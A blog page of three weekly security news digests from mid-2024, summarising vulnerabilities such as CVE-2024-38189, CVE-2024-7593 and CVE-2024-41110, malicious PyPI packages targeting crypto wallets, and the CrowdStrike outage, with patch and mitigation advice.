Rose debug info
---------------

how human behavior affects security

Later Ctrl + ↑

Programmer’s Digest #95

08/07/2024-08/14/2024 Microsoft Issues Patches for 90 Flaws, Rogue PyPI Library Solana, Patch Released for High-Severity OpenSSH Vulnerability And More.

1. Microsoft Issues Patches for 90 Flaws, Including 10 Critical Zero-Day Exploits

Microsoft released fixes for 90 security flaws, including 10 zero-days, with six actively exploited. Among the 90 bugs, seven are Critical, 79 Important, and one Moderate. The updates also cover 36 Edge browser vulnerabilities.

Notably, six zero-days are addressed:

  • CVE-2024-38189: Microsoft Project Remote Code Execution (CVSS 8.8)
  • CVE-2024-38178: Windows Scripting Engine Memory Corruption (CVSS 7.5)
  • CVE-2024-38193: WinSock Elevation of Privilege (CVSS 7.8)
  • CVE-2024-38106: Windows Kernel Elevation of Privilege (CVSS 7.0)
  • CVE-2024-38107: Power Dependency Coordinator Elevation of Privilege (CVSS 7.8)
  • CVE-2024-38213: Mark of the Web Security Feature Bypass (CVSS 6.5)

Trend Micro’s Peter Girnus discovered CVE-2024-38213, leading CISA to add these flaws to its Known Exploited Vulnerabilities (KEV) catalog. Additionally, four CVEs are publicly known, including a Microsoft Office Spoofing Vulnerability (CVE-2024-38200, CVSS 7.5) that could expose NTLM hashes through phishing. Microsoft also fixed a Print Spooler privilege escalation flaw (CVE-2024-38198, CVSS 7.8) but has not released updates for CVE-2024-38202 and CVE-2024-21302. A separate report from Fortra highlighted a DoS flaw in the CLFS driver (CVE-2024-6768, CVSS 6.8), which Microsoft will address in a future update.

2. Rogue PyPI Library Solana Users, Steals Blockchain Wallet Keys

Cybersecurity researchers have discovered a new malicious package on the Python Package Index (PyPI) repository that masquerades as a library from the Solana blockchain platform but is actually designed to steal victims’ secrets. The malicious “solana-py” package attracted a total of 1,122 downloads since it was published on August 4, 2024. It’s no longer available for download from PyPI. The most striking aspect of the library is that it carried the version numbers 0.34.3, 0.34.4, and 0.34.5. The latest version of the legitimate “solana” package is 0.34.3. This clearly indicates an attempt on the part of the threat actor to trick users looking for “solana” into inadvertently downloading “solana-py” instead. The attack campaign poses a supply chain risk in that Sonatype’s investigation found that legitimate libraries like “solders” make references to “solana-py” in their PyPI documentation, leading to a scenario where developers could have mistakenly downloaded “solana-py” from PyPI and broadened the attack surface. If a developer using the legitimate ‘solders’ PyPI package in their application is mislead (by solders’ documentation) to fall for the typosquatted ‘solana-py’ project, they’d inadvertently introduce a crypto stealer into their application. 

3. Ivanti Virtual Traffic Manager Flaw Let Hackers Create Rogue Admin Accounts

Ivanti Virtual Traffic Manager has been discovered with a critical vulnerability which was associated with authentication bypass. This vulnerability has been assigned with CVE-2024-7593 and the severity was given as 9.8. However, Ivanti has patched this vulnerability and released a security advisory to address it. This vulnerability allows an unauthenticated remote threat actor to bypass the admin panel authentication and perform malicious actions.

Further, a threat actor can also create an administrator account on the vulnerable Ivanti instances as a backdoor. This particular vulnerability exists due to the incorrect implementation of the authentication algorithm in Ivanti vTM. Nevertheless, this vulnerability exists in all versions of Ivanti vTM other than versions 22.2R1 or 22.7R2. Ivanti also advises its users to restrict access to the management interface and ensure they are placed on a private IP with restricted access.

4. Urgent Patch Released for High-Severity OpenSSH Vulnerability on FreeBSD

On August 12, 2024, the FreeBSD Project released a critical update for a high-severity vulnerability in OpenSSH, identified as CVE-2024–7589, which has a CVSS score of 7.4.
This flaw could allow attackers to remotely execute arbitrary code with elevated privileges on affected systems. CVE-2024–7589 stems from a flaw in the signal handler of the sshd(8) daemon, used for handling SSH connections. The issue arises when a logging function, not async-signal-safe, is called within the signal handler, potentially leading to race conditions.

This vulnerability could give attackers complete control over the affected system, making it a severe security risk. Users should update FreeBSD to a version with the latest security patches and restart the sshd(8) daemon to mitigate this issue.

5. Microsoft Reveals Four OpenVPN Flaws Leading to Potential RCE and LPE

Microsoft on Thursday disclosed four medium-severity security flaws in the open-source OpenVPN software that could be chained to achieve remote code execution (RCE) and local privilege escalation (LPE). This attack chain could enable attackers to gain full control over targeted endpoints, potentially resulting in data breaches, system compromise, and unauthorized access to sensitive information.

The list of vulnerabilities is as follows:

  • CVE-2024-27459: Stack overflow vulnerability causing DoS and LPE in Windows.
  • CVE-2024-24974: Unauthorized access to the “\openvpn\service” named pipe in Windows, allowing remote operations.
  • CVE-2024-27903: Plugin mechanism vulnerability leading to RCE in Windows and LPE/data manipulation in Android, iOS, macOS, and BSD.
  • CVE-2024-1305: Memory overflow vulnerability causing DoS in Windows.

The first three of the four flaws are rooted in a component named openvpnserv, while the last one resides in the Windows Terminal Access Point (TAP) driver. An attacker could leverage at least three of the four discovered vulnerabilities to create exploits to facilitate RCE and LPE, which could then be chained together to create a powerful attack chain. 

6. CISA Warns of Hackers Exploiting Legacy Cisco Smart Install Feature

(CISA) has revealed that threat actors are exploiting the legacy Cisco Smart Install (SMI) feature to access sensitive data. Adversaries are using this method to acquire system configuration files by exploiting vulnerabilities in Cisco devices.

CISA has also noted the prevalence of weak password types on Cisco network devices, making them vulnerable to password-cracking attacks. The agency recommends using “type 8” password protection and suggests reviewing the NSA’s Smart Install Protocol Misuse advisory for configuration guidance. Cisco has also warned of critical flaws (CVE-2024-20419, CVE-2024-20450, CVE-2024-20452, CVE-2024-20454) in its Smart Software Manager and SPA Series IP Phones. These vulnerabilities could lead to unauthorized access, arbitrary command execution, or denial-of-service conditions.

7 mo   digest   programmers'

Programmer’s Digest #94

07/31/2024-08/07/2024 New Linux Kernel Exploit Technique ‘SLUBStick, Critical Security Flaw in WhatsUp Gold, Malicious Python Packages And More.

1. New Linux Kernel Exploit Technique ‘SLUBStick’ Discovered by Researchers

Cybersecurity researchers have discovered a new Linux kernel exploitation technique called SLUBStick, which can elevate a limited heap vulnerability to an arbitrary memory read-and-write primitive. Researchers from Graz University of Technology explained that SLUBStick exploits a timing side-channel of the allocator for a reliable cross-cache attack, achieving a success rate above 99% for frequently used generic caches.

Memory safety vulnerabilities in the Linux kernel are typically hard to exploit due to security features like SMAP, KASLR, and kCFI. Traditional cross-cache attack methods have a success rate of only 40%. SLUBStick, demonstrated on Linux kernel versions 5.19 and 6.2, uses nine security flaws found between 2021 and 2023 to achieve root privilege escalation and container escapes. This method effectively bypasses defenses like KASLR, assuming the presence of a heap vulnerability and code execution capabilities by an unprivileged user.

The researchers noted SLUBStick’s ability to exploit recent systems with a variety of heap vulnerabilities.

2. Critical Security Flaw in WhatsUp Gold Under Active Attack – Patch Now

 A critical security flaw in Progress Software’s WhatsUp Gold is under active exploitation, urging users to quickly apply the latest updates. The vulnerability, CVE-2024-4885 (CVSS score: 9.8), is an unauthenticated remote code execution bug in versions before 2023.1.3. It allows execution of commands with iisapppool\nmconsole privileges due to inadequate validation of user-supplied paths in the GetFileWithoutZip method.

Exploitation attempts have been observed since August 1, 2024, with a proof-of-concept exploit released by researcher Sina Kheirkhah. Version 2023.1.3 also addresses two other critical flaws (CVE-2024-4883 and CVE-2024-4884) and a high-severity privilege escalation issue (CVE-2024-5009). Admins must apply updates and restrict traffic to trusted IP addresses to mitigate threats.

3. 0.0.0.0 Day exploit reveals 18-year-old security flaw in Chrome, Safari, and Firefox

An 18-year-old vulnerability, the “0.0.0.0 Day” flaw, allows malicious websites to bypass security protocols in major browsers like Google Chrome, Mozilla Firefox, and Apple Safari. This flaw mainly impacts Linux and macOS devices, enabling threat actors to change settings, access sensitive information, and execute remote code. Initially reported in 2008, the issue remains unresolved, though developers are working on fixes.

The vulnerability stems from inconsistent security mechanisms and the use of the “wildcard” IP address 0.0.0.0, which attackers exploit to target local services. Researchers at Oligo Security have noted active exploitation by threat actors, with campaigns targeting AI workloads and Selenium Grid servers.
Browser developers are planning updates to block access to 0.0.0.0. Meanwhile, Oligo recommends using PNA headers, verifying HOST headers, and employing HTTPS and CSRF tokens for added security.

4. Hackers Distributing Malicious Python Packages via Popular Developer Q&A Platform

Threat actors are tricking users into downloading malware via Stack Exchange, targeting developers with bogus Python packages that drain cryptocurrency wallets. 

The rogue packages include:

  • raydium (762 downloads)
  • raydium-sdk (137 downloads)
  • sol-instruct (115 downloads)
  • sol-structs (292 downloads)
  • spl-types (776 downloads)

These packages, downloaded 2,082 times, contained malware that stole data, including web browser passwords, cryptocurrency wallets, and messaging app information. They also captured screenshots and searched for sensitive files. The data was exfiltrated to Telegram bots. The malware included a backdoor for persistent remote access.

The attackers used Stack Exchange to promote these packages by posting seemingly helpful answers to developer questions. This campaign highlights the need for developers and organizations to reassess their security strategies to prevent supply chain attacks.

5. North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

Threat actors in an ongoing malware campaign, dubbed DEV#POPPER and linked to North Korea, have expanded their tactics to target Windows, Linux, and macOS systems. This campaign targets software developers globally, including South Korea, North America, Europe, and the Middle East.

Securonix researchers revealed that the attackers pose as interviewers, urging candidates to download a ZIP file for a coding assignment. This file contains a malicious npm module that triggers the BeaverTail malware, which identifies the operating system and exfiltrates data.

The malware can also download additional payloads, including the InvisibleFerret Python backdoor, which steals system metadata, browser cookies, and logs keystrokes. Enhanced obfuscation and AnyDesk remote monitoring software are used for persistence. Despite heavy sanctions, North Korea continues to import foreign technology to enhance its operational security.

7 mo   digest   programmers'

Programmer’s Digest #93

07/24/2024-07/31/2024 Flaw in Telerik, ConfusedFunction Flaw in Google Cloud, Critical Docker Engine Flaw And More.

1. Critical Flaw in Telerik Report Server Poses Remote Code Execution Risk

Progress Software urges users to update their Telerik Report Server instances due to a critical security flaw (CVE-2024-6327) with a CVSS score of 9.9. This vulnerability affects versions 2024 Q2 (10.1.24.514) and earlier and can lead to remote code execution via insecure deserialization. The flaw has been fixed in version 10.1.24.709.
For temporary mitigation, change the user for the Report Server Application Pool to one with limited permissions. Check server vulnerability by logging into the Report Server web UI, opening the Configuration page, and checking the version number under the About tab.

This disclosure follows another critical flaw (CVE-2024-4358) patched nearly two months ago, which CISA added to its Known Exploited Vulnerabilities catalog on June 13.

2. Researchers Uncover ConfusedFunction Flaw in Google Cloud

Tenable researchers discovered a privilege escalation flaw in Google Cloud Platform’s (GCP) Cloud Functions service, named ‘ConfusedFunction’. This vulnerability allows attackers to gain higher privileges to the Default Cloud Build Service Account and access services like Cloud Build, storage, and container registry without authorization.

The exploit enables attackers to move laterally and upgrade privileges, accessing and modifying unauthorized data. Cloud Functions, a serverless environment, attaches a default Cloud Build service account with excessive permissions when a function is created or updated.

After Tenable reported the issue, Google partially fixed it for accounts created after mid-June 2024. However, existing accounts remain vulnerable. Google updated the default behavior for Cloud Build to use a Compute Engine default service account and released additional policies to control default service account usage.

 

3. Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins

Docker warns of a critical flaw (CVE-2024-41110) in certain Docker Engine versions that allows attackers to bypass authorization plugins (AuthZ), carrying a CVSS score of 10.0. The flaw occurs when an API request with Content-Length set to 0 causes the Docker daemon to forward the request without the body to the AuthZ plugin, potentially approving it incorrectly. The issue, originally fixed in 2019, reappeared in later versions and has been resolved in Docker Engine versions 23.0.14 and 27.1.0 as of July 2024.

Affected versions include:

  • <= v19.03.15
  • <= v20.10.27
  • <= v23.0.14
  • <= v24.0.9
  • <= v25.0.5
  • <= v26.0.2
  • <= v26.1.4
  • <= v27.0.3, and
  • <= v27.1.0

Docker Desktop up to version 4.32.0 is also affected, but a fix is expected in version 4.33.

Users should update to the latest version to mitigate potential threats.
 

4. CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software

The Internet Systems Consortium (ISC) has released patches for multiple vulnerabilities in the BIND 9 DNS software that could trigger denial-of-service (DoS) attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) identified four key vulnerabilities:

  • CVE-2024-4076 (CVSS 7.5): Logic error in lookups could cause an assertion failure.
  • CVE-2024-1975 (CVSS 7.5): Validating DNS messages with SIG(0) can overload CPU.
  • CVE-2024-1737 (CVSS 7.5): Excessive resource record types slow down processing.
  • CVE-2024-0760 (CVSS 7.5): Malicious queries over TCP can render the server unresponsive.

These flaws can cause unexpected termination, CPU resource depletion, and slow query processing. The issues are fixed in BIND 9 versions 9.18.28, 9.20.0, and 9.18.28-S1. There is no evidence of these vulnerabilities being exploited in the wild.

5. CrowdStrike Software Update Leads to Significant Global Tech Outage

CrowdStrike announced a major global outage caused by a recent update to its Falcon security software, impacting 8.5 million devices. The update, intended to gather telemetry on new threat techniques, inadvertently caused Windows systems to crash on July 19, 2024. The issue primarily affected Windows 10 and later versions, leaving Mac and Linux systems unaffected.

The outage disrupted airlines, banking, and media sectors worldwide. CrowdStrike quickly identified the problem, working with Microsoft to develop and deploy fixes. The recovery involved installing backups, booting into safe mode, and manually deleting files. Full restoration is expected to take several days. CrowdStrike and Microsoft provided recovery tools and support. The financial impact is estimated at $5.4 billion, with minimal insurance coverage. For continuous updates, visit CrowdStrike’s official website.

8 mo   digest   programmers'
Earlier Ctrl + ↓